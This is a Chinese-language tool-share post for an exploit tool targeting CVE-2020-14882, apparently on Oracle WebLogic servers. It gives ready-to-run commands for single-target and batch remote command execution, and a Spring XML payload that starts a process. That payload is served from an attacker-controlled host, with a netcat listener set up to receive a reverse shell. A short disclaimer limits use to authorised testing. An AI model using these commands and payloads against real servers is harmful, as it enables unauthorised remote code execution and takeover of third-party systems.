CVE-2020-14882_ALL综合利用工具

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/GGyao/CVE-2020-14882_ALL

CVE-2020-14882_ALL

CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。

需要模块:requests、http.client

(工具仅用于授权的安全测试,请勿用于非法使用,违规行为与作者无关。)

命令回显模块已知成功版本:12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

选项

 

ad1a1b7183180319

功能一:命令回显

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"

 

ad1a1b7183180330

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"

 

ad1a1b7183180343

功能二:批量命令回显

python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"

target.txt 格式:http://x.x.x.x:xx,一行一个。

4.png

 

功能三:外置xml文件无回显命令执行

1、Linux反弹shell为例,编辑好poc.xml文件,开启python监听。

 
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
	<value>cmd</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

开启python监听。

 

ad1a1b7183180417

nc开启监听。

 

ad1a1b7183180426

 

2、使用-x选项指定xml文件路径,发送payload。

python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml

 

ad1a1b7183180439

3、成功接收shell。

 

ad1a1b7183180450

 
标签:工具分享, EXP脚本